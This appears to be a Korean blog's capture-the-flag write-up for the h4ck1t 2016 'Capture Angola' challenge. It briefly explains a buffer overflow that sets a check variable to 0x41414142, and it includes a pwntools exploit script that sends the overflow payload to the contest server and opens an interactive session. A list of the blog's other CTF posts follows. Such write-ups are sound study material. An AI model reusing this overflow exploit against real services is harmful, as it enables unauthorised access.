-
h4ck1t - Capture AngolaCTF 2016. 10. 3. 15:55
s variable에서 오버플로우가 발생한다.
v10조건은 0x41414142가되어야하는데, s변수에서 0x76을 덮어주면 도달할수있다.
1234567891011121314from pwn import *p = remote("ctf.com.ua",9011)tomorrow = "tomorrow"payload = "AAAB"*69print p.recvuntil("Yesterday you said")p.sendline("tomorrow" + payload)print p.recvuntil("Some people dream of")p.sendline("success")print p.recvuntil("You should get to the")p.sendline("point")p.interactive()cs 'CTF' 카테고리의 다른 글
[DEFCON 2014] Babyfirst heap (1) 2016.10.20 WITHCON - malloc (double free bug) (0) 2016.10.10 CSAW 2016 - Clams Don't Dance (0) 2016.09.19 CSAW 2016 - tutorial (0) 2016.09.18 ASIS CTF Finals 2016 - shadow (0) 2016.09.12
